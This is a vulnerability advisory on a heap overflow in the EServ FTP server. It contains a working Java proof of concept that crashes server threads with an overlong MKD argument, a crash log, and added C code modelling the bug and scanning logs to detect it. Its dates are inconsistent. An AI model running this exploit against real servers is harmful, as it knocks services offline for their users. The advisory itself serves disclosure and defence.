EServ LOG buffer overflow vulnerability

Published: 2000-04-15
Updated: 2000-04-15
Severity: medium
Threat: remote denial of service
Bug type: input validation error
Attack vector: server side

Affected systems

EServ <= 2.9.2

Detailed description

EServ does not bound the length of the strings it writes into its LOG records. A remote client can therefore trigger a heap buffer overflow by sending an overlong command argument. The proof of concept below logs in (with the supplied credentials, or anonymously) and issues MKD with a 10000-byte argument; the server then faults with an access violation (exception code C0000005 at address 49247E) in the thread handling that connection. As the analyst's note in the log excerpt below says, the crash is confined to that thread and does not affect the other threads.

Test code

--------------------------------------------------------
/* Proof of concept code for the heap overflow in EServ <= 2.9.2
 * Written 10/05/2000 by Andrew Lewis aka. Wizdumb [MDMA]
 */
import java.io.*;
import java.net.*;

class eservheap {
    public static void main(String[] args) throws IOException {
        if (args.length < 1) {
            System.out.println("Syntax: java eservheap <host> [user] [pass]");
            System.exit(1);
        }

        Socket soq = null;
        PrintWriter white = null;
        BufferedReader weed = null;
        try {
            soq = new Socket(args[0], 21);
            white = new PrintWriter(soq.getOutputStream(), true);
            weed = new BufferedReader(new InputStreamReader(soq.getInputStream()));
        } catch (Exception e) {
            System.out.println("Problems connecting :-/");
            System.exit(1);
        }

        weed.readLine();  // server banner (220 ...)

        // Log in with the given user/pass, or anonymously
        String juzer = (args.length == 3) ? ("USER " + args[1]) : "USER anonymous";
        String pasz = (args.length == 3) ? ("PASS " + args[2]) : "PASS mdma";
        // FTP commands are terminated by CRLF; USER and PASS go as two separate lines
        white.print(juzer + "\r\n");
        white.flush();
        weed.readLine();  // 331 ...
        white.print(pasz + "\r\n");
        white.flush();
        weed.readLine();  // 230 ...

        // MKD with a 10000-byte argument: the handling thread faults on this
        StringBuilder mkd = new StringBuilder("MKD ");
        for (int i = 0; i < 10000; i++) mkd.append('A');
        white.print(mkd + "\r\n");
        white.flush();
        weed.readLine();  // reply, if the thread survives long enough to send one

        white.print("QUIT\r\n");
        white.flush();
        soq.close();
    }
}
--------------------------------------------------------

The following excerpt from e.log, with the analyst's comments, shows the effect of the code above:

----------------------------------------
27.05.2000 17:02:19 Eserv/2.92 2986 1 EXCEPTION! CODE:C0000005 ADDRESS:49247E WORD:C!
REGISTERS:
1C5EC6C 50 62 34 00 36 5D 4E 00 FF 5F 34 00 0C 27 00 00 Pb4.6]N._4..`..
1C5EC7C E8 FD 00 00 41 00 00 00 48 FF C5 01 7E 24 49 00 ..A...H.~$I.
1C5EC8C 1B 00 00 00 46 02 01 00 9C EE C5 01 23 00 00 00 .....F..._.#...
/* Ie. Thread crashes on MKD, but has no effect on other threads */
USER DATA: 346250
HANDLER: 1C5EED0
RETURN STACK:
1C5EE9C : 498BB9 C!
1C5EEA0 : 4C2AF0 HOLD
1C5EEA4 : 4CAC34 HOLDS /* these HOLDS are buggy - no length checking */
1C5EEA8 : 7FFFE6FC <not in the image>
1C5EEAC : 7FFFD8F4 <not in the image>
1C5EEB0 : 4CAC49 HOLDS
1C5EEB4 : 4E5E12 MKD
1C5EEB8 : 49B279 |DROP
1C5EEBC : 2 <not found>
1C5EEC0 : 339DE8 <not found>
1C5EEC4 : 270C <not found>
1C5EEC8 : 4C42C1 INTERPRET
1C5EECC : 4C303F NEW_CATCH
1C5EED0 : 1C5EF14 <not in the image>
----------------------------------------

Solution

None available yet.

Related information
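The return stack above faults inside HOLD, called from HOLDS, called from MKD: in Forth, HOLD stores one character at the next lower address of a fixed pad and HOLDS does the same for a whole string, so a string longer than the pad walks below it into whatever data lies beneath. The following C model, added here as an illustration and not EServ's code, shows that unchecked downward copy beside a bounded one. The arena layout (32 bytes of neighbouring data directly below a 64-byte pad) and the function names are assumptions made for the demo; the real server has no arena boundary, which is why a 10000-byte MKD argument keeps writing into adjacent heap memory.

```c
/* Added example (not EServ's code): a Forth-style HOLD/HOLDS record builder
 * that fills a fixed pad top-down with no length check, beside a bounded one.
 * Arena layout and names are assumptions made for this demo. */
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define NEIGHBOUR_SIZE 32u                   /* unrelated data just below the pad */
#define PAD_SIZE       64u                   /* fixed-size pad, filled top-down */
#define ARENA_SIZE     (NEIGHBOUR_SIZE + PAD_SIZE)
#define PAD_BOTTOM     NEIGHBOUR_SIZE        /* lowest index that belongs to the pad */
#define PAD_TOP        ARENA_SIZE            /* HOLD starts here and moves down */

/* mem[0..32) = 'N' sentinel bytes (the neighbour), mem[32..96) = the pad */
void arena_init(unsigned char *mem) {
    memset(mem, 'N', NEIGHBOUR_SIZE);
    memset(mem + NEIGHBOUR_SIZE, 0, PAD_SIZE);
}

/* Vulnerable HOLDS: copies s backwards from index pos, never comparing pos
 * against PAD_BOTTOM. Returns the new pos. The stop at index 0 exists only
 * so this demo stays inside 'mem'; the bug being modelled has no such stop. */
size_t holds_unchecked(unsigned char *mem, size_t pos, const char *s, size_t len) {
    for (size_t i = 0; i < len && pos > 0; i++)
        mem[--pos] = (unsigned char)s[len - 1 - i];
    return pos;
}

/* Bounded HOLDS: refuses the string unless it fits between PAD_BOTTOM and pos. */
bool holds_checked(unsigned char *mem, size_t pos, const char *s, size_t len,
                   size_t *newpos) {
    if (pos < PAD_BOTTOM || len > pos - PAD_BOTTOM)
        return false;                        /* would overflow the pad: reject */
    for (size_t i = 0; i < len; i++)
        mem[--pos] = (unsigned char)s[len - 1 - i];
    *newpos = pos;
    return true;
}

/* Number of neighbour bytes that no longer hold the sentinel. */
size_t neighbour_corrupted(const unsigned char *mem) {
    size_t n = 0;
    for (size_t i = 0; i < NEIGHBOUR_SIZE; i++)
        if (mem[i] != 'N') n++;
    return n;
}

/* Push an MKD-style argument of 'len' 'A's through one of the builders and
 * report how many neighbour bytes it clobbered. */
size_t clobbered_by(bool checked, size_t len) {
    unsigned char mem[ARENA_SIZE];
    char arg[256];
    size_t newpos;
    if (len > sizeof arg) len = sizeof arg;
    memset(arg, 'A', len);
    arena_init(mem);
    if (checked)
        holds_checked(mem, PAD_TOP, arg, len, &newpos);
    else
        holds_unchecked(mem, PAD_TOP, arg, len);
    return neighbour_corrupted(mem);
}

/* Whether the bounded builder accepts an argument of 'len' bytes from PAD_TOP. */
bool checked_accepts(size_t len) {
    unsigned char mem[ARENA_SIZE];
    char arg[256];
    size_t newpos;
    if (len > sizeof arg) len = sizeof arg;
    memset(arg, 'A', len);
    arena_init(mem);
    return holds_checked(mem, PAD_TOP, arg, len, &newpos);
}

int main(void) {
    printf("unchecked, 40 bytes: %zu neighbour bytes clobbered\n", clobbered_by(false, 40));
    printf("unchecked, 80 bytes: %zu neighbour bytes clobbered\n", clobbered_by(false, 80));
    printf("checked,   80 bytes: %zu neighbour bytes clobbered, accepted=%d\n",
           clobbered_by(true, 80), (int)checked_accepts(80));
    return 0;
}
```

With a 40-byte argument both builders stay inside the pad; with 80 bytes the unchecked one overwrites the 16 lowest neighbour bytes, while the bounded one rejects the string and leaves the neighbour untouched. A 64-byte argument is the largest the bounded builder accepts, which is exactly the pad size.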
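Since the crash only kills one thread, an operator may not notice the denial of service until several connections have been lost. The scanner below, added here as an example and not part of the advisory or of EServ, parses the EXCEPTION record format shown in the e.log excerpt above and counts access violations (exception code C0000005) so that the condition can be alerted on. The sample log is constructed for the demo: it reuses the record from the excerpt, the register dump lines that follow it, and a second constructed record with a later timestamp; the two numeric fields after the version string are skipped because the page does not say what they mean.

```c
/* Added example, not part of the advisory: scan EServ e.log text for the
 * "EXCEPTION!" record shown on this page and count access violations.
 * The sample log at the bottom is constructed for the demo. */
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

#define STATUS_ACCESS_VIOLATION 0xC0000005UL   /* NTSTATUS: invalid memory access */

struct eserv_exception {
    char date[16], time[16], version[32];
    unsigned long code, address;   /* CODE: and ADDRESS: fields, hex */
    char word[32];                 /* the Forth word that faulted, e.g. "C!" */
};

/* Parse one e.log line such as
 *   27.05.2000 17:02:19 Eserv/2.92 2986 1 EXCEPTION! CODE:C0000005 ADDRESS:49247E WORD:C!
 * Returns true only for EXCEPTION records; any other line fails to match
 * the literal "EXCEPTION!" and yields fewer than six conversions. */
bool parse_exception(const char *line, struct eserv_exception *ex) {
    int n = sscanf(line,
                   "%15s %15s %31s %*s %*s EXCEPTION! CODE:%lx ADDRESS:%lx WORD:%31s",
                   ex->date, ex->time, ex->version, &ex->code, &ex->address, ex->word);
    return n == 6;
}

/* Faulting address of an EXCEPTION record, or 0 for any other line. */
unsigned long faulting_address(const char *line) {
    struct eserv_exception ex;
    return parse_exception(line, &ex) ? ex.address : 0;
}

/* Walk newline-separated log text, count access-violation records and keep
 * the faulting word of the last one ("" if none was seen). */
static char last_word[32];

size_t count_access_violations(const char *log) {
    size_t hits = 0;
    last_word[0] = '\0';
    for (const char *p = log; *p; ) {
        const char *nl = strchr(p, '\n');
        size_t len = nl ? (size_t)(nl - p) : strlen(p);
        char line[512];
        if (len >= sizeof line) len = sizeof line - 1;   /* truncate oversize lines */
        memcpy(line, p, len);
        line[len] = '\0';
        struct eserv_exception ex;
        if (parse_exception(line, &ex) && ex.code == STATUS_ACCESS_VIOLATION) {
            hits++;
            snprintf(last_word, sizeof last_word, "%s", ex.word);
        }
        p = nl ? nl + 1 : p + len;
    }
    return hits;
}

const char *last_faulting_word(void) { return last_word; }

/* Constructed sample: the record from the advisory, the dump lines that
 * follow it in e.log, and a second constructed record from a later crash. */
const char *sample_log =
    "27.05.2000 17:02:19 Eserv/2.92 2986 1 EXCEPTION! CODE:C0000005 ADDRESS:49247E WORD:C!\n"
    "REGISTERS:\n"
    "1C5EC6C 50 62 34 00 36 5D 4E 00 FF 5F 34 00 0C 27 00 00 Pb4.6]N._4..`..\n"
    "USER DATA: 346250\n"
    "27.05.2000 17:03:05 Eserv/2.92 2991 1 EXCEPTION! CODE:C0000005 ADDRESS:49247E WORD:C!\n";

int main(void) {
    size_t n = count_access_violations(sample_log);
    printf("%zu access violation(s); last faulting word: %s\n", n, last_faulting_word());
    return 0;
}
```

Repeated records with the same ADDRESS and WORD, as in the sample, are the signature to alert on: the same fault site hit from different sessions means clients are driving the server into this bug rather than a single stray crash.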